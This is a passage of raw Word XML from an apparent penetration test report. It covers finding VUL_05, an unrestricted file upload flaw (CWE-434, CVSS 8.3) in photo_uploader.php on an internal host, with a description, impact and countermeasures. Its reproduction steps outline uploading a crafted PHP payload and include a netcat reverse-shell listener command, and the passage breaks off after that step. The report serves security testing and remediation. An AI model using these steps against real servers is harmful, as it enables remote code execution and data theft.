          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BC7F50" w14:textId="414FD2C5" w:rsidR="006534C1" w:rsidRPr="00D77DFE" w:rsidRDefault="006534C1" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-1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156202" w:rsidRPr="00D77DFE" w14:paraId="002FAD76" w14:textId="77777777" w:rsidTr="00094048">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49917B8" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00094048">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0E2841" w:themeColor="text2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Insecure File Uploads in photo_uploader.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="7204416F" w14:textId="77777777" w:rsidTr="00094048">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01E4383" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">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
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>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410C28B" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">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
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Risk Rating:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="67870913"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84F3197" w14:textId="062C93FD" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VUL_05</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12E47D9" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251755520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A22E107" wp14:editId="09D3BD94">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>787400</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="716364631"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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>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71A6E2" id="Rectangle: Rounded Corners 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:62pt;margin-top:2.75pt;width:125.8pt;height:10.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="442EEFF8"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274156A" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">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
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVSS: 8.3</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A665DF1" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CWE:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156202" w:rsidRPr="00D77DFE" w14:paraId="7EA8E216" w14:textId="77777777" w:rsidTr="00094048">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7B8DC07" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/S:C/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>C:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>I:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>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9DDD7B3" w14:textId="77777777" w:rsidR="00156202" w:rsidRPr="00D77DFE" w:rsidRDefault="00156202" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CWE-434: Unrestricted Upload of File with Dangerous Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00686E5B" w:rsidRPr="00D77DFE" w14:paraId="1CCF25EA" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="264"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9439" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="2FF6740F" w14:textId="629E534D" w:rsidR="00686E5B" w:rsidRPr="00D77DFE" w:rsidRDefault="00686E5B" w:rsidP="00D84933">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:rtl/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tools Used:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00686E5B" w:rsidRPr="00D77DFE" w14:paraId="6D874EFB" w14:textId="77777777" w:rsidTr="00094048">
        <w:trPr>
          <w:trHeight w:val="264"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9439" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="156082" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="09D939B3" w14:textId="0904037D" w:rsidR="00686E5B" w:rsidRPr="00D77DFE" w:rsidRDefault="00686E5B" w:rsidP="00D84933">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Browser, msfvenom, Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="6FE47FB3" w14:textId="77777777" w:rsidTr="00094048">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167A2FD" w14:textId="2321ADA4" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Description: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="7292777A" w14:textId="77777777" w:rsidTr="00094048">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235BCA2" w14:textId="6480253E" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00D84933">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sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>File upload vulnerabilities occur when the server allows uploads without proper validation, enabling attackers to upload arbitrary and potentially dangerous files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="19C66760"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B9B8EE8" w14:textId="1AD0750B" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Vulnerable URLs / IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="6304E172"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CFE4E0C" w14:textId="2272629B" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00D84933">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="1E8ED559"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77E2CF0" w14:textId="1F188BEC" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">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
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Implications / Consequences of not Fixing the Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="3AA188B8"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E735C1C" w14:textId="056C1970" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00D84933">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Cs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>This flaw enables attackers to upload and execute server-side code, leading to remote code execution, full system compromise, and theft or exfiltration of sensitive data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="1B382272"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4FD0F13" w14:textId="182B0696" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00343DA4">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
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Suggested Countermeasures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w14:paraId="0F248213"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BDBED1F" w14:textId="19EF9B71" w:rsidR="00343DA4" w:rsidRPr="00D77DFE" w:rsidRDefault="00343DA4" w:rsidP="00D84933">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Cs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Use a whitelist of allowed extensions, block directory traversal sequences in filenames, and rename uploaded files to prevent overwriting existing content.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w14:paraId="5D4951D0"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F7F2F60" w14:textId="67391113" w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w:rsidRDefault="00903A2D" w:rsidP="00903A2D">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to Reproduce: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w14:paraId="46887561"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4BA4C92" w14:textId="77777777" w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w:rsidRDefault="00903A2D" w:rsidP="00585A7B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Navigate to the profile image upload function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A184A84" w14:textId="77777777" w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w:rsidRDefault="00903A2D" w:rsidP="00585A7B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Upload a crafted PHP payload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50EF7CC0" w14:textId="77777777" w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w:rsidRDefault="00903A2D" w:rsidP="00585A7B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepare a listener on the attacker's host: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;port&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2183560A" w14:textId="460EBA2F" w:rsidR="00903A2D" w:rsidRPr="00D77DFE" w:rsidRDefault="00903A2D" w:rsidP="00585A7B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
